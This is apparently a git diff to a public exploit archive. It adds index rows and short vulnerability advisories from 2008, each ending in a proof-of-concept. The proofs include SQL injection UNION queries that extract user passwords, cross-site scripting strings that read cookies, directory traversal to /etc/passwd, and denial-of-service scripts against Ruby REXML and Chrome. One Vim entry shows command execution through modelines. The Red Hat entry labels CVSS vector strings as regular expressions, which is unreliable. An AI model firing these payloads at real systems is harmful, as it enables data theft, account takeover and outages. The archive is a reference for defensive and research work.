diff --git a/files.csv b/files.csv
index a20024fdf..ebffb7fe8 100755
--- a/files.csv
+++ b/files.csv
@@ -29055,3 +29055,48 @@ id,file,description,date,author,platform,type,port
 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0
 32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0
 32282,platforms/php/webapps/32282.txt,"Church Edit Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0
+32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0
+32284,platforms/php/webapps/32284.txt,"Simasy CMS 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0
+32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0
+32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 Directory Traversal Vulnerability",2008-08-21,"Deniz Cevik",linux,remote,0
+32287,platforms/php/webapps/32287.txt,"FAR-PHP 1.0 'index.php' Local File Include Vulnerability",2008-08-21,"Beenu Arora",php,webapps,0
+32288,platforms/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps,0
+32289,platforms/linux/remote/32289.txt,"Vim <= 7.1.314 Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote,0
+32290,platforms/php/webapps/32290.txt,"Accellion File Transfer Multiple Cross-Site Scripting Vulnerabilities",2008-08-22,"Eric Beaulieu",php,webapps,0
+32291,platforms/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 Search Cross-Site Scripting Vulnerability",2008-08-22,"Tyler Trioxide",php,webapps,0
+32292,platforms/linux/dos/32292.rb,"Ruby <= 1.9 REXML Remote Denial Of Service Vulnerability",2008-08-23,"Luka Treiber",linux,dos,0
+32293,platforms/php/webapps/32293.txt,"One-News Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0
+32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 ActiveX Control Remote Buffer Overflow Vulnerability",2008-08-22,"Jeremy Brown",windows,dos,0
+32295,platforms/php/webapps/32295.txt,"PHP-Ultimate Webboard 2.0 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps,0
+32296,platforms/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,php,webapps,0
+32297,platforms/asp/webapps/32297.txt,"Smart Survey 1.0 'surveyresults.asp' Cross Site Scripting Vulnerability",2008-08-26,"Bug Researchers Group",asp,webapps,0
+32298,platforms/php/webapps/32298.txt,"HP System Management Homepage (SMH) <= 2.1.12 'message.php' Cross Site Scripting Vulnerability",2008-08-26,"Luca Carettoni",php,webapps,0
+32299,platforms/php/webapps/32299.txt,"MatterDaddy Market 1.1 'admin/login.php' Cross Site Scripting Vulnerability",2008-08-26,"Sam Georgiou",php,webapps,0
+32300,platforms/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 'search.asp' Cross-Site Scripting Vulnerability",2008-08-26,JoCk3r,asp,webapps,0
+32301,platforms/windows/remote/32301.py,"Kyocera Mita Scanner File Utility 3.3.0.1 File Transfer Directory Traversal Vulnerability",2008-08-26,"Seth Fogie",windows,remote,0
+32302,platforms/php/webapps/32302.txt,"AbleSpace 1.0 'adv_cat.php' Cross-Site Scripting Vulnerability",2008-08-27,"Bug Researchers Group",php,webapps,0
+32303,platforms/linux/remote/32303.txt,"Mono <= 2.0 'System.Web' HTTP Header Injection Vulnerability",2008-08-20,"Juraj Skripsky",linux,remote,0
+32304,platforms/linux/dos/32304.txt,"Red Hat 8/9 Directory Server Crafted Search Pattern Denial of Service Vulnerability",2008-08-27,"Ulf Weltman",linux,dos,0
+32305,platforms/hardware/dos/32305.txt,"Dreambox Web Interface URI Remote Denial of Service Vulnerability",2008-08-29,"Marc Ruef",hardware,dos,0
+32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0
+32307,platforms/php/webapps/32307.txt,"vtiger CRM 5.0.4 Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0
+32308,platforms/php/webapps/32308.txt,"GenPortal 'buscarCat.php' Cross-Site Scripting Vulnerability",2008-09-01,sl4xUz,php,webapps,0
+32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script 'landsee.php' SQL Injection Vulnerability",2008-08-29,"Hussin X",php,webapps,0
+32310,platforms/multiple/dos/32310.txt,"Softalk Mail Server 8.5.1 'APPEND' Command Remote Denial of Service Vulnerability",2008-09-02,Antunes,multiple,dos,0
+32311,platforms/multiple/dos/32311.html,"Google Chrome 0.2.149 Malformed 'title' Tag Remote Denial of Service Vulnerability",2008-09-02,Exodus,multiple,dos,0
+32312,platforms/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 'page' Parameter Cross-Site Scripting Vulnerability",2008-09-02,Am!r,php,webapps,0
+32313,platforms/php/webapps/32313.txt,"OpenDB 1.0.6 user_admin.php user_id Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0
+32314,platforms/php/webapps/32314.txt,"OpenDB 1.0.6 listings.php title Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0
+32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 user_profile.php redirect_url Parameter XSS",2008-08-28,C1c4Tr1Z,php,webapps,0
+32316,platforms/php/webapps/32316.txt,"eliteCMS 1.0 'page' Parameter SQL Injection Vulnerability",2008-09-03,e.wiZz!,php,webapps,0
+32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps,0
+32318,platforms/php/webapps/32318.txt,"XRMS 1.99.2 login.php target Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
+32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Auth Bypass/CSRF Vulnerabilities",2014-03-17,"TN CYB3R",php,webapps,0
+32320,platforms/php/webapps/32320.txt,"XRMS 1.99.2 activities/some.php title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
+32321,platforms/php/webapps/32321.txt,"XRMS 1.99.2 companies/some.php company_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
+32322,platforms/php/webapps/32322.txt,"XRMS 1.99.2 contacts/some.php last_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
+32323,platforms/php/webapps/32323.txt,"XRMS 1.99.2 campaigns/some.php campaign_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
+32324,platforms/php/webapps/32324.txt,"XRMS 1.99.2 opportunities/some.php opportunity_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
+32325,platforms/php/webapps/32325.txt,"XRMS 1.99.2 cases/some.php case_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
+32326,platforms/php/webapps/32326.txt,"XRMS 1.99.2 files/some.php file_id Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
+32327,platforms/php/webapps/32327.txt,"XRMS 1.99.2 reports/custom/mileage.php starting Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0
diff --git a/platforms/asp/webapps/32297.txt b/platforms/asp/webapps/32297.txt
new file mode 100755
index 000000000..86d503a2a
--- /dev/null
+++ b/platforms/asp/webapps/32297.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30841/info
+
+Smart Survey is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Smart Survey 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/surveyresults.asp?folder=/123adminxyz/SmartSurve/&title=example.com&sid=[XSS] 
\ No newline at end of file
diff --git a/platforms/asp/webapps/32300.txt b/platforms/asp/webapps/32300.txt
new file mode 100755
index 000000000..87b4b4c1e
--- /dev/null
+++ b/platforms/asp/webapps/32300.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30849/info
+
+ASP Search Engine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+ASP Search Engine 1.5.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/resource/searchdemo/search.asp?look_for="><script>alert("JoCk3r")</script> 
\ No newline at end of file
diff --git a/platforms/hardware/dos/32305.txt b/platforms/hardware/dos/32305.txt
new file mode 100755
index 000000000..0b9aec26d
--- /dev/null
+++ b/platforms/hardware/dos/32305.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30919/info
+
+Dreambox is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the affected device, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+Dreambox DM500C is vulnerable; other models may also be affected. 
+
+open|send GET http://www.example.com/aaa(...)
+HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.# ### * 
\ No newline at end of file
diff --git a/platforms/linux/dos/32292.rb b/platforms/linux/dos/32292.rb
new file mode 100755
index 000000000..9c8a14dd7
--- /dev/null
+++ b/platforms/linux/dos/32292.rb
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/30802/info
+
+Ruby is prone to a remote denial-of-service vulnerability in its REXML module.
+
+Successful exploits may allow remote attackers to cause denial-of-service conditions in applications that use the vulnerable module.
+
+Versions up to and including Ruby 1.9.0-3 are vulnerable. 
+
+#!/usr/bin/env ruby
+require 'rexml/document'
+
+doc = REXML::Document.new(<<END)
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE member [
+  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
+  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
+  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
+  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
+  <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
+  <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
+  <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
+]>
+<member>
+&a;
+</member>
+END
+
+puts doc.root.text.size
+
+
diff --git a/platforms/linux/dos/32304.txt b/platforms/linux/dos/32304.txt
new file mode 100755
index 000000000..d88f063a8
--- /dev/null
+++ b/platforms/linux/dos/32304.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/30871/info
+
+Red Hat Directory Server is prone to a denial-of-service vulnerability because the server fails to handle specially crafted search patterns.
+
+An attacker can exploit this issue to consume CPU resources with one search request, effectively blocking additional search requests from executing. Legitimate users may be prevented from authenticating to network resources that use the affected server for authentication.
+
+Red Hat Directory Server 7.1 and 8 are affected. 
+
+The following example regular expressions are available:
+
+2.6/AV:N/AC:H/Au:N/C:N/I:N/A:P
+4.0/AV:N/AC:L/Au:S/C:N/I:N/A:P
\ No newline at end of file
diff --git a/platforms/linux/remote/32286.txt b/platforms/linux/remote/32286.txt
new file mode 100755
index 000000000..eb76554a6
--- /dev/null
+++ b/platforms/linux/remote/32286.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/30780/info
+
+Fujitsu Web-Based Admin View is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the application's HTTP server.
+
+Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
+
+Web-Based Admin View 2.1.2 is vulnerable; other versions may also be affected.
+
+
+The following example is available:
+
+GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
+Host: www.example.com:8081 
\ No newline at end of file
diff --git a/platforms/linux/remote/32289.txt b/platforms/linux/remote/32289.txt
new file mode 100755
index 000000000..a087145a4
--- /dev/null
+++ b/platforms/linux/remote/32289.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/30795/info
+
+Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Successfully exploiting these issues can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.
+
+Versions prior to Vim 7.2.010 are vulnerable. 
+
+Copy-and-paste these examples into separate files:
+
+;xclock
+vim: set iskeyword=;,@
+
+Place your cursor on ``xclock'', and press K. xclock appears.
+
+;date>>pwned
+vim: set iskeyword=1-255
+
+Place your cursor on ``date'' and press K. File ``pwned'' is created in
+the current working directory.
+
+Please note: If modeline processing is disabled, set the 'iskeyword'
+option manually. 
\ No newline at end of file
diff --git a/platforms/linux/remote/32303.txt b/platforms/linux/remote/32303.txt
new file mode 100755
index 000000000..870f7c589
--- /dev/null
+++ b/platforms/linux/remote/32303.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30867/info
+
+Mono is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sanitize input.
+
+By inserting arbitrary headers into an HTTP response, attackers may be able to launch cross-site request-forgery, cross-site scripting, HTTP-request-smuggling, and other attacks.
+
+This issue affects Mono 2.0 and earlier. 
+
+<script runat="server"> void Page_Load(object o, EventArgs e) { // Query parameter text is not checked before saving in user cookie NameValueCollection request = Request.QueryString; // Adding cookies to the response Response.Cookies["userName"].Value = request["text"]; } </script> 
\ No newline at end of file
diff --git a/platforms/multiple/dos/32310.txt b/platforms/multiple/dos/32310.txt
new file mode 100755
index 000000000..4abbe1751
--- /dev/null
+++ b/platforms/multiple/dos/32310.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30970/info
+
+Softalk Mail Server is prone to a remote denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
+Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+Softalk Mail Server 8.5.1 is vulnerable; other versions may also be affected. 
+
+APPEND Ax5000 (UIDNEXT MESSAGES) 
\ No newline at end of file
diff --git a/platforms/multiple/dos/32311.html b/platforms/multiple/dos/32311.html
new file mode 100755
index 000000000..0963292f3
--- /dev/null
+++ b/platforms/multiple/dos/32311.html
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30975/info
+
+Google Chrome is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input.
+
+Attackers can exploit this issue to make the application unresponsive, denying service to legitimate users.
+
+Google Chrome 0.2.149.27 is vulnerable; other versions may also be affected.
+
+NOTE: Reports indicate that this issue may not be exploitable as described and may depend on a particular WebKit configuration. 
+
+<!-- Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit Exploit written by Exodus. http://www.blackhat.org.il http://www.blackhat.org.il/index.php/ready-set-chrome/ http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html --> <HTML> <HEAD> <TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE> <SCRIPT language="JavaScript"> function buff(len) { var buffer; for(var i = 0; i != len; i++) { buffer += 'E';} return buffer; } </SCRIPT> </HEAD> <SCRIPT> document.write('<body title=\"' + buff(31337) + '\">'); </SCRIPT> </BODY> </HTML> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32283.txt b/platforms/php/webapps/32283.txt
new file mode 100755
index 000000000..241be5805
--- /dev/null
+++ b/platforms/php/webapps/32283.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30772/info
+
+DXShopCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+DXShopCart 4.30mc is vulnerable; other versions may also be affected. 
+
+http://www.example.com.com/product_detail.php?cid=12&pid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/32284.txt b/platforms/php/webapps/32284.txt
new file mode 100755
index 000000000..62c43ac73
--- /dev/null
+++ b/platforms/php/webapps/32284.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30774/info
+
+Simasy CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com.com/index.php?page=8&id=95+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3+from+users/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/32285.txt b/platforms/php/webapps/32285.txt
new file mode 100755
index 000000000..f5b1f9598
--- /dev/null
+++ b/platforms/php/webapps/32285.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30777/info
+
+vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected. 
+
+--></script><script>alert(/xss/.source)</script><!-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/32287.txt b/platforms/php/webapps/32287.txt
new file mode 100755
index 000000000..52c5e33f5
--- /dev/null
+++ b/platforms/php/webapps/32287.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30781/info
+
+FAR-PHP is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+http://www.example.com/farver/index.php?c=/../../../../../../../../boot.ini%00 
\ No newline at end of file
diff --git a/platforms/php/webapps/32288.txt b/platforms/php/webapps/32288.txt
new file mode 100755
index 000000000..2cdcb3b61
--- /dev/null
+++ b/platforms/php/webapps/32288.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30789/info
+
+TimeTrex is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+TimeTrex versions 2.2.12 and previous are vulnerable. 
+
+http://www.example.com/interface/Login.php?user_name=admin&password=XSS
+http://www.example.com/interface/Login.php?user_name=XSS 
\ No newline at end of file
diff --git a/platforms/php/webapps/32290.txt b/platforms/php/webapps/32290.txt
new file mode 100755
index 000000000..2c115c1c4
--- /dev/null
+++ b/platforms/php/webapps/32290.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30796/info
+
+
+Accellion File Transfer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Accellion File Transfer FTA_7_0_135 is vulnerable; prior versions may also be affected. 
+
+https://www.example.com/courier/forgot_password.html/>"><script>alert(document.cookie)</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32291.txt b/platforms/php/webapps/32291.txt
new file mode 100755
index 000000000..8b0780796
--- /dev/null
+++ b/platforms/php/webapps/32291.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30798/info
+
+Photo Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Photo Cart 3.9 is vulnerable; other versions may also be affected. 
+
+POST <script>alert(document.cookie)</script> to "Gallery or event name" field 
\ No newline at end of file
diff --git a/platforms/php/webapps/32293.txt b/platforms/php/webapps/32293.txt
new file mode 100755
index 000000000..533f6442a
--- /dev/null
+++ b/platforms/php/webapps/32293.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30804/info
+
+One-News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and multiple HTML-injection issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Beta 2 of One-News is prone to these issues. 
+
+http://www.example.com/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/32295.txt b/platforms/php/webapps/32295.txt
new file mode 100755
index 000000000..3f2d40f40
--- /dev/null
+++ b/platforms/php/webapps/32295.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30822/info
+
+PHP-Ultimate Webboard is prone multiple-input validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Successful exploits will allow unauthorized attackers to delete arbitrary questions and answers. Attackers may also exploit these issues to perform SQL-injection attacks.
+
+PHP-Ultimate Webboard 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/webboard/admindel.php?action=delete&mode=question&qno=[NUM]&ano=[NUM] 
\ No newline at end of file
diff --git a/platforms/php/webapps/32296.txt b/platforms/php/webapps/32296.txt
new file mode 100755
index 000000000..c32a27708
--- /dev/null
+++ b/platforms/php/webapps/32296.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30827/info
+
+Bluemoon inc. PopnupBlog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PopnupBlog 3.30 is affected; other versions may also be vulnerable.
+
+http://www.example.com/modules/popnupblog/index.php?param=1">[XSS-CODE]&start=0,10&cat_id=&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=">[XSS-CODE]&view=1 http://www.example.com/modules/popnupblog/index.php?param=&start=0,10&cat_id=&view=1">[XSS-CODE] 
\ No newline at end of file
diff --git a/platforms/php/webapps/32298.txt b/platforms/php/webapps/32298.txt
new file mode 100755
index 000000000..41d6a577e
--- /dev/null
+++ b/platforms/php/webapps/32298.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30846/info
+
+HP System Management Homepage (SMH) is prone to a cross-site scripting vulnerability.
+
+Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+NOTE: This issue may stem from an incomplete fix for the issues discussed in BIDs 24256 (HP System Management Homepage (SMH) Unspecified Cross Site Scripting Vulnerability) and 25953 (HP System Management Homepage (SMH) for Linux, Windows, and HP-UX Cross Site Scripting Vulnerability), but Symantec has not confirmed this.
+
+1st vector) https://www.example.com/message.php?<script><script>alert('xss')</script></script> 2nd vector) https://www.example.com/message.php?aa%00<script><script>alert('xss')</script></script> 3rd vector) https://www.example.com/message.php?aa<BGSOUND SRC="javascript:alert('XSS');"> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32299.txt b/platforms/php/webapps/32299.txt
new file mode 100755
index 000000000..0dc20b469
--- /dev/null
+++ b/platforms/php/webapps/32299.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30848/info
+
+MatterDaddy Market is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MatterDaddy Market 1.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/dir(s)/admin/login.php?msg=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/32302.txt b/platforms/php/webapps/32302.txt
new file mode 100755
index 000000000..f3968e4be
--- /dev/null
+++ b/platforms/php/webapps/32302.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30864/info
+
+AbleSpace is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects AbleSpace 1.0 and earlier.
+
+http://www.example.com/adv_cat.php?find_str="><script>alert('1')</script>&cat_id=1&razd_id=&x=0&y=0 
\ No newline at end of file
diff --git a/platforms/php/webapps/32306.txt b/platforms/php/webapps/32306.txt
new file mode 100755
index 000000000..4406cf688
--- /dev/null
+++ b/platforms/php/webapps/32306.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30924/info
+
+dotProject is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Attackers may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+dotProject 2.1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?m=tasks&inactive=toggle"> http://www.example.com/index.php?m=calendar&a=day_view&date=20080828"> http://www.example.com/index.php?m=public&a=calendar&dialog=1&callback=setCalendar"> http://www.example.com/index.php?m=ticketsmith&type=My'> http://www.example.com/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/32307.txt b/platforms/php/webapps/32307.txt
new file mode 100755
index 000000000..fa27373bb
--- /dev/null
+++ b/platforms/php/webapps/32307.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30951/info
+
+vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+vtiger CRM 5.0.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
+http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
+http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/32308.txt b/platforms/php/webapps/32308.txt
new file mode 100755
index 000000000..54a9d1785
--- /dev/null
+++ b/platforms/php/webapps/32308.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30957/info
+
+GenPortal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/path/buscarCat.php?palBuscar=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/32309.txt b/platforms/php/webapps/32309.txt
new file mode 100755
index 000000000..d09cbc431
--- /dev/null
+++ b/platforms/php/webapps/32309.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30962/info
+
+Full PHP Emlak Script is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/Script/landsee.php?id=-9+union+select+1,2,3,concat(username,0x3a,sifre),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+FROM+admin--
+
+
diff --git a/platforms/php/webapps/32312.txt b/platforms/php/webapps/32312.txt
new file mode 100755
index 000000000..439caafa7
--- /dev/null
+++ b/platforms/php/webapps/32312.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30980/info
+
+IDevSpot BizDirectory is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+BizDirectory 2.04 is vulnerable; other verisons may also be affected. 
+
+http://www.example.com/?page=[XsS]&mode=search 
\ No newline at end of file
diff --git a/platforms/php/webapps/32313.txt b/platforms/php/webapps/32313.txt
new file mode 100755
index 000000000..918b22647
